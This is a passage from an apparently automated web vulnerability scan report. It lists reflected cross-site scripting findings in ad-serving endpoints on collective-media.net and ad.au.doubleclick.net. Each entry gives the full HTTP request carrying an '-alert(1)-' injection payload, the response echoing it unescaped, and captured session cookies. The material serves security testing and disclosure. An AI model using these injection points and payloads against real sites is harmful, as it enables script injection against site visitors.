Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; targ=1; mmpg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 528
Date: Mon, 02 May 2011 14:57:45 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 14:57:45 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;net=6a;ord=9400127232074738?6d284'-alert(1)-'03c000bc2e;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

6.14. http://a.collective-media.net/adj/6a.orbitcast/tech.general.ros/other [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/6a.orbitcast/tech.general.ros/other

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b379'-alert(1)-'7cb02ce77db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/6a.orbitcast/tech.general.ros/other;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;ord=9400127232074738?&8b379'-alert(1)-'7cb02ce77db=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; targ=1; mmpg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 532
Vary: Accept-Encoding
Date: Mon, 02 May 2011 14:58:17 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 14:58:17 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;net=6a;ord=9400127232074738?&8b379'-alert(1)-'7cb02ce77db=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

6.15. http://a.collective-media.net/adj/cm.guardian/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.guardian/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bbb5'-alert(1)-'5fcdaad9d48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.guardian2bbb5'-alert(1)-'5fcdaad9d48/;sz=728x90;ord=$random$? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22544-2.html?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; dc=dc; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 437
Vary: Accept-Encoding
Date: Mon, 02 May 2011 12:50:48 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 12:50:48 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.guardian2bbb5'-alert(1)-'5fcdaad9d48/;sz=728x90;net=cm;ord=$random$;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

6.16. http://a.collective-media.net/adj/cm.guardian/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.guardian/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2bbd'-alert(1)-'1d315ad8d9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.guardian/;sz=728x90;ord=$random$?&c2bbd'-alert(1)-'1d315ad8d9e=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22544-2.html?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; dc=dc; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 441
Vary: Accept-Encoding
Date: Mon, 02 May 2011 12:50:46 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 12:50:46 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.guardian/;sz=728x90;net=cm;ord=$random$?&c2bbd'-alert(1)-'1d315ad8d9e=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

6.17. http://a.collective-media.net/adj/cm.guardian/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.guardian/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fe83'-alert(1)-'af780e57a1c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.guardian/;sz=728x90;ord=$random$?9fe83'-alert(1)-'af780e57a1c HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22544-2.html?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; dc=dc; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 438
Vary: Accept-Encoding
Date: Mon, 02 May 2011 12:50:44 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 01-Jun-2011 12:50:44 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.guardian/;sz=728x90;net=cm;ord=$random$?9fe83'-alert(1)-'af780e57a1c;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

6.18. http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/6a.orbitcast/tech.general.ros/other

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f26dd'-alert(1)-'74c9b80dd6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadjf26dd'-alert(1)-'74c9b80dd6b/6a.orbitcast/tech.general.ros/other;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;net=6a;ord=9400127232074738;ord1=7385;cmpgurl=http%253A//www.orbitcast.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; targ=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 02 May 2011 14:59:34 GMT
Connection: close
Content-Length: 7428

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("6a-57634638_1304348374","http://ad.doubleclick.net/adjf26dd'-alert(1)-'74c9b80dd6b/6a.orbitcast/tech.general.ros/other;net=6a;u=,6a-57634638_1304348374,11f8f328940989e,ce,am.h-am.b-dx.16-dx.23-dx.17-cm.ent_m-cm.music_h;;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;cmw
...[SNIP]...

6.19. http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/6a.orbitcast/tech.general.ros/other

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee8db'-alert(1)-'c950acb7221 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/6a.orbitcastee8db'-alert(1)-'c950acb7221/tech.general.ros/other;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;net=6a;ord=9400127232074738;ord1=7385;cmpgurl=http%253A//www.orbitcast.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; targ=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 02 May 2011 15:00:00 GMT
Connection: close
Content-Length: 7428

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("6a-13048608_1304348400","http://ad.doubleclick.net/adj/6a.orbitcastee8db'-alert(1)-'c950acb7221/tech.general.ros/other;net=6a;u=,6a-13048608_1304348400,11f8f328940989e,ce,am.h-am.b-dx.16-dx.23-dx.17-cm.ent_m-cm.music_h;;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;cmw=owl;sz=728x9
...[SNIP]...

6.20. http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/6a.orbitcast/tech.general.ros/other

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f71a'-alert(1)-'368975efe8c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/6a.orbitcast/tech.general.ros8f71a'-alert(1)-'368975efe8c/other;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;net=6a;ord=9400127232074738;ord1=7385;cmpgurl=http%253A//www.orbitcast.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; targ=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 02 May 2011 15:00:22 GMT
Connection: close
Content-Length: 7428

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("6a-99110641_1304348422","http://ad.doubleclick.net/adj/6a.orbitcast/tech.general.ros8f71a'-alert(1)-'368975efe8c/other;net=6a;u=,6a-99110641_1304348422,11f8f328940989e,ce,am.h-am.b-dx.16-dx.23-dx.17-cm.ent_m-cm.music_h;;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;cmw=owl;sz=728x90;net=6a;ord1=738
...[SNIP]...

6.21. http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/6a.orbitcast/tech.general.ros/other

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d15cc'-alert(1)-'5d32a32f2c1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/6a.orbitcast/tech.general.ros/otherd15cc'-alert(1)-'5d32a32f2c1;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;sz=728x90;net=6a;ord=9400127232074738;ord1=7385;cmpgurl=http%253A//www.orbitcast.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; targ=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 02 May 2011 15:00:55 GMT
Connection: close
Content-Length: 7428

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("6a-85532793_1304348455","http://ad.doubleclick.net/adj/6a.orbitcast/tech.general.ros/otherd15cc'-alert(1)-'5d32a32f2c1;net=6a;u=,6a-85532793_1304348455,11f8f328940989e,ce,am.h-am.b-dx.16-dx.23-dx.17-cm.ent_m-cm.music_h;;anx=120;referer=http%3A%2F%2Fwww.orbitcast.com%2F;mc=a;pl=1;cmw=owl;sz=728x90;net=6a;ord1=7385;cont
...[SNIP]...

6.22. http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other [anx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/6a.orbitcast/tech.general.ros/other

Issue detail

The value of the anx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3350f'-alert(1)-'0a71c06d7f7 was submitted in the anx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/6a.orbitcast/tech.general.ros/other;anx=3350f'-alert(1)-'0a71c06d7f7 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orbitcast.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; nadp=1; exdp=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; targ=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 02 May 2011 14:57:46 GMT
Connection: close
Content-Length: 7290

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
AndAttachAd("6a-76473120_1304348266","http://ad.doubleclick.net/adj/6a.orbitcast/tech.general.ros/other;net=6a;u=,6a-76473120_1304348266,11f8f328940989e,none,dx.16-dx.23-dx.17-cm.ent_m-cm.music_h;;anx=3350f'-alert(1)-'0a71c06d7f7;contx=none;dc=w;btg=dx.16;btg=dx.23;btg=dx.17;btg=cm.ent_m;btg=cm.music_h?","0","0",false);</scr'+'ipt>
...[SNIP]...

6.23. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 115fb"-alert(1)-"85e938b1609 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329115fb"-alert(1)-"85e938b1609&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:52:09 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
MW_X3_300x125_14Mar2011.gif";
var minV = 9;
var FWH = ' width="300" height="125" ';
var url = escape("http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329115fb"-alert(1)-"85e938b1609&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/1
...[SNIP]...

6.24. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0a77'-alert(1)-'22b0344f2f7 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329d0a77'-alert(1)-'22b0344f2f7&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 12:52:14 GMT
Content-Length: 6343

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\r\n<!-- Code auto-generated on Mon Apr 04 07:35:43 EDT 2011 -->\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329d0a77'-alert(1)-'22b0344f2f7&UIT=G&TargetID=10928385&AN=2017002340&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=http://ad.au.doubleclick.net/6k%3Bh%3Dv8/3afb/17/dc/%2a/f%3B240447302%3B0-0%3B0%3B57764189%3B367-300/1
...[SNIP]...

6.25. http://ad.au.doubleclick.net/adj/N799.125935.3435369420621/B5110009 [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /adj/N799.125935.3435369420621/B5110009

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e57e6"-alert(1)-"48b41a44627 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N799.125935.3435369420621/B5110009;sz=300x125;dcopt=rcl;click0=http://wrapper.g.REDACTED.com/GRedirect.aspx?g.REDACTED.com/2AD00042/55000000000042726.1?!&&PID=8197329&UIT=G&TargetID=10928385&AN=2017002340e57e6"-alert(1)-"48b41a44627&PG=AUBEEN&ASID=97866bc3bc534483a55e34973920acb3&destination=;ord=2017002340? HTTP/1.1
Host: ad.au.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.nineREDACTED.com.au/national/8241327/migration-proposal-weak-abbott-says?alert=yes
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
